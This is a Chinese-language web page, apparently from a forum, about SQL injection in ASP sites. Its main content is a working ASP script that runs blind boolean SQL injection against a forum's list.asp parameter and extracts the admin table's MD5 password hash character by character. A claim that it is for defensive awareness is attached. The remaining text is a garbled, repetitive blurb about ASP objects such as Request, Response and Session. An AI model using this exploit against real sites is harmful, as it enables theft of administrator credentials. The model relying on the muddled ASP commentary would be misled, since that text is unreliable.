ASP网页设计SQL注进研讨
缺点:安全性不是太差了,还行,只要你充分利用系统自带的工具;唯一缺点就是执行效率慢,如何进行网站优化以后,效果会比较好。请勿用于不法用处,本代码只是为了让宽大ASP喜好者分明道理,提防于已然。Functionbytes2BSTR(vIn)
dimstrReturn
dimi,ThisCharCode,NextCharCode
strReturn=""
Fori=1ToLenB(vIn)
ThisCharCode=AscB(MidB(vIn,i,1))
IfThisCharCode<&H80Then
strReturn=strReturn&Chr(ThisCharCode)
Else
NextCharCode=AscB(MidB(vIn,i+1,1))
strReturn=strReturn&Chr(CLng(ThisCharCode)*&H100+CInt(NextCharCode))
i=i+1
EndIf
Next
bytes2BSTR=strReturn
EndFunction
functiongetHTTPPage(url)
dimhttp
sethttp=createobject("MSXML2.XMLHTTP")
Http.open"GET",url,false
Http.send()
ifHttp.readystate4then
exitfunction
endif
getHTTPPage=bytes2BSTR(Http.responseBody)
sethttp=nothing
iferr.number0thenerr.Clear
endfunction
FunctionRegExpTest(patrn,strng)
DimregEx,retVal创建变量。
SetregEx=NewRegExp创建正则表达式。
regEx.Pattern=patrn设置形式。
regEx.IgnoreCase=False设置是不是辨别巨细写。
RegExpTest=regEx.Test(strng)实行搜刮测试。
EndFunction
password=""
keyword="论坛首页"前往准确页面会呈现的字符串
url1="http://qq/bbs/list.asp?boardid=7"SQL注进出口
passlen=32MD5暗码一般是32位
dimpass
pass=array(48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102)暗码值一般是0-9,a-f
server.ScriptTimeout=999
fori=1topasslen
flag=false
url=url1&"and(selectasc(mid(password,"&i&",1))fromadminwhereid>0)="机关的SQL语句这里才是关头
forj=0toubound(pass)
str=getHTTPPage(url&pass(j))
flag=RegExpTest(keyword,str)
ifflag=truethen
password=password&chr(pass(j))
exitfor
endif
next
next
response.Write(password)
</p>asp,jsp,php是web开发的三大技术,asp简单易用且有microsoft做靠山,jsp功能强大是因为有java支持,php则开源跨平台.在国内,asp应用范围最广,jsp发展势头最猛,php则处于劣势.这可能与公司的支持以及技术的培训有关. 代码的可重用性差:由于是面向结构的编程方式,并且混合html,所以可能页面原型修改一点,整个程序都需要修改,更别提代码重用了。 Server:这个表示的服务器,操作服务器的一些东西使用这个,如Server.Mappath转换服务器路径,Server.CreateObject实例化一个组件 用户端的浏览器不需要提供任何别的支持,这样大提高了用户与服务器之间的交互的速度。 Session:这个存储跟客户端会话过程的数据,默认20分钟失效 它可通过内置的组件实现更强大的功能,如使用A-DO可以轻松地访问数据库。 Request:从字面上讲就是“请求”,因此这个是处理客户端提交的东东的,例如Resuest.Form,Request.QueryString,或者干脆Request("变量名") Response:从字面上讲是“响应”,因此这个是服务端向客户端发送东西的,例如Response.Write 它可通过内置的组件实现更强大的功能,如使用A-DO可以轻松地访问数据库。 ASP(ActiveServerPages)是Microsfot公司1996年11月推出的WEB应用程序开发技术,它既不是一种程序语言,也不是一种开发工具,而是一种技术框架,不须使用微软的产品就能编写它的代码,能产生和执行动态、交互式、高效率的站占服务器的应用程序。
页:
[1]